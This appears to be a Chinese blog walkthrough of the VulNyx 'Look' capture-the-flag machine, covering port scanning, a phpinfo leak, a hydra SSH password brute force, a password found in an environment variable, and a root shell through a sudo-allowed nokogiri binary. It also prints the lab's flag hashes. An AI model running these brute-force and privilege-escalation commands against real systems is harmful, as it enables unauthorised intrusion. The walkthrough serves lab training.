Vlx_Look

靶机来源:https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:48 CST
Nmap scan report for 192.168.2.1
Host is up (0.00097s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0019s latency).
MAC Address: 08:00:27:92:7B:DF (Oracle VirtualBox virtual NIC)
Nmap scan report for contact.com (192.168.2.44)
Host is up (0.0067s latency).
MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.18 seconds

靶机IP:192.168.2.70

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.44                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:49 CST
Nmap scan report for contact.com (192.168.2.44)
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.20 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.44 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:50 CST
Nmap scan report for contact.com (192.168.2.44)
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.44                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 15:50 CST
Nmap scan report for contact.com (192.168.2.44)
Host is up (0.00098s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:0E:F3:64 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.46 seconds

二、WEB渗透

1、80网站

访问80端口,是Apache的默认页面 img

2、目录扫描

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.44 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/index.html           (Status: 200) [Size: 10701]
/.html                (Status: 403) [Size: 277]
/info.php             (Status: 200) [Size: 69372]
/javascript           (Status: 301) [Size: 317] [--> http://192.168.2.44/javascript/]
/look.php             (Status: 200) [Size: 75]
...

访问info.php,是phpinfo的配置信息 img

找到SSH的账号axel img

三、SSH密码爆破

找到用户名axel,使用hydra对密码进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/miaosec]
└─# hydra -t 64 -l axel -P /tools/wordlist/pass.txt ssh://192.168.2.44 -F -I 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-14 16:16:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10003 login tries (l:1/p:10003), ~157 tries per task
[DATA] attacking ssh://192.168.2.44:22/
[STATUS] 495.00 tries/min, 495 tries in 00:01h, 9546 to do in 00:20h, 26 active
[22][ssh] host: 192.168.2.44   login: axel   password: bambam
[STATUS] attack finished for 192.168.2.44 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-14 16:18:43

成功获取到密码bambam

四、获取到axel权限

直接使用凭证axel:bambam进行登录

1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# ssh axel@192.168.2.44
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.44' (ED25519) to the list of known hosts.
axel@192.168.2.44's password: 
axel@look:~$ id
uid=1000(axel) gid=1000(axel) grupos=1000(axel)

五、权限提升

1、获取dylan权限

查看环境变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
axel@look:/$ env
SHELL=/bin/bash
PWD=/
LOGNAME=axel
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/axel
LANG=es_ES.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.2.4 39252 192.168.2.44 22
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=axel
SHLVL=1
XDG_SESSION_ID=7
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.2.4 39252 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dylanPASS=bl4bl4Dyl4N
SSH_TTY=/dev/pts/1
_=/usr/bin/env
OLDPWD=/var/www

找到用户dylan的密码bl4bl4Dyl4N

获取到用户dylan的shell

1
2
3
4
axel@look:/$ su dylan
Contraseña: 
dylan@look:/$ id
uid=1001(dylan) gid=1001(dylan) grupos=1001(dylan)

2、获取root权限

查看sudo -l

1
2
3
4
5
6
dylan@look:/$ sudo -l
Matching Defaults entries for dylan on look:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dylan may run the following commands on look:
    (root) NOPASSWD: /usr/bin/nokogiri

Nokogiri 是一个强大的 Ruby 库,用于解析和操作 XML 和 HTML 文档

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dylan@look:~$ sudo /usr/bin/nokogiri
Nokogiri: an HTML, XML, SAX, and Reader parser
Usage: nokogiri <uri|path> [options]

Examples:
  nokogiri https://www.ruby-lang.org/
  nokogiri ./public/index.html
  curl -s http://www.nokogiri.org | nokogiri -e'p $_.css("h1").length'

Options:
        --type type                  Parse as type: xml or html (default: auto)
    -C file                          Specifies initialization file to load (default /root/.nokogirirc)
    -E, --encoding encoding          Read as encoding (default: none)
    -e command                       Specifies script from command-line.
        --rng <uri|path>             Validate using this rng file.
    -?, --help                       Show this message
    -v, --version                    Show version

直接运行-e参数,提示我们需要一个文件路径,再选择参数

1
2
Nokogiri: an HTML, XML, SAX, and Reader parser
Usage: nokogiri <uri|path> [options]

选择一个文件后,执行shell

1
2
3
dylan@look:~$ sudo /usr/bin/nokogiri .profile -e 'exec "/bin/bash"'
root@look:/home/dylan# id
uid=0(root) gid=0(root) grupos=0(root)

六、查看FLAG

1
2
3
root@look:/# cat /root/root.txt /home/axel/user.txt 
5e1a6f7770b8836974a6da06f32ecf6e
084eb686418576cdde1ce01e2e9ad0dd
Vulnyx
#SSH_burf #PHPinfo #env #Sudo_nokogiri
Vlx_Look
http://miao-sec.github.io/Vulnyx/Vlx_Look/
作者
Miao
发布于
2026年1月14日
许可协议
BY-MIAO